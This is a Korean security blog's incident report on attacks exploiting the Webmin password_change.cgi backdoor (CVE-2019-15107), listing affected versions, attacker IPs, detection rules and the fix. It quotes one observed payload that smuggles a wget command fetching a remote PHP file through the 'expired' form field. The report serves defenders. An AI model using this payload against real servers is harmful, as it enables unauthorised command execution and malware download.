[2019.08.30] Webmin 취약점 공격 성행 (CVE-2019-15107)

2019. 9. 2. 17:36

요약

*Webmin : 원격 유닉스 기반 시스템 관리 웹 어플리케이션

- 8/20 일경 Webmin 주요 원격코드 취약점/백도어 취약점(CVE-2019-15107) 가 공개 된 다음날부터(8/21) 공격 시작

- 취약점 : SourceForge에서 제공했던 Webmin 패지키에 악성코드가 삽입되어 있어,

취약 버전을 해당 사이트에서 다운받을 시 Webmin이 설치 된 모든 Linux, FreeBSD, OpenBSD 서버에 접근 가능.

- 영향받는 제품 : SourceForge에서 다운로드한

Webmin 1.882 ~ 1.921 버전

*Webmin 1.890 버전 : 초기 설정 유지 시 즉각적인 업데이트 필요

- 선행 조건 : 1.890 이 외 버전의 경우 만료된 비밀번호 바꾸기가 enable 되어 있는 경우에만 취약

- 취약점 스캔 IP : 89.248.171.57

- 공격 IP : hxxps://pastebin.com/Piqerntf 문서 참고

페이로드 :

POST /password_change.cgi HTTP/1.1 "user=roots&pam=&expired=2|wget http://128.199.251.119/webmin.php;etc&old=foo&new2=bar"

목표 포트 : 10000

공격 IP

107.152.33.18

91.33.88.112

144.140.214.82

190.94.144.2

54.39.123.246

190.94.148.209

74.198.243.135

191.100.8.141

162.250.59.87

94.130.51.16

149.154.64.98

91.121.157.178

191.100.11.144

190.94.141.20

190.94.139.188

51.75.195.222

218.161.28.223

176.140.192.16

213.6.16.226

35.160.164.0

103.10.61.93

51.75.195.222

185.181.164.30

40.78.3.140

47.102.47.25

75.98.169.36

159.65.216.53

201.238.154.235

191.100.11.27

191.100.11.230

191.100.11.117

178.128.55.225

34.230.66.41

79.0.3.212

- 대표 공격 IP : 147.135.124.113 IoT Botnet CloudBot Det (8/24이후 지속적으로 국내/해외 그룹사의 10000포트로 접근 시도)

(https://twitter.com/bad_packets/status/1165120433462493186?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1165120433462493186&ref_url=https%3A%2F%2Fwww.zdnet.com%2Farticle%2Fhackers-mount-attacks-on-webmin-servers-pulse-secure-and-fortinet-vpns%2F)

- 공식 대응법 : Webmin 1.930 버전으로 업데이트

관련 CVE정보

- CVE-2019-15107

- CVSS Base Score : 9.8

- PoC : Webmin 비인가자 원격 코드 실행

https://www.exploit-db.com/exploits/47230

https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html

탐지룰 존재유무

- IBM : HTTP_Webmin_PasswordChange_Exec

- Symantec : Web Attack: Webmin Remote Code Execution CVE-2019-15107

참고자료

출처 : https://sensorstechforum.com/cve-2019-15107-webmin/

https://www.zdnet.com/article/hackers-mount-attacks-on-webmin-servers-pulse-secure-and-fortinet-vpns/

Webmin 백도어 : https://www.zdnet.com/article/backdoor-found-in-webmin-a-popular-web-based-utility-for-managing-unix-servers/

저작자표시 비영리 변경금지

'Incident Report' 카테고리의 다른 글

[2019.09.02] 8월 29일 기점 미라이 감염 장비 DVR/IP BruteForcing 공격 이상 트래픽 탐지 (0)	2019.09.02
[2019.08.30] Pulse Secure VPN(CVE-2019-11510) 취약점 공격 성행 (0)	2019.09.02
[2019.08.06] WordPress 서비스를 이용한 리눅스 봇넷 백도어 다운로드 현황 포착 (0)	2019.09.02
[2019.06.10] BlueKeep에 이은 GoldBrute RDP 서버 무차별 대입공격 성행 (0)	2019.06.10
[2017] ShadowPad 공격 (0)	2019.03.26

해외 보안 트렌드

[2019.08.30] Webmin 취약점 공격 성행 (CVE-2019-15107)

'Incident Report' 카테고리의 다른 글

+ Recent posts

티스토리툴바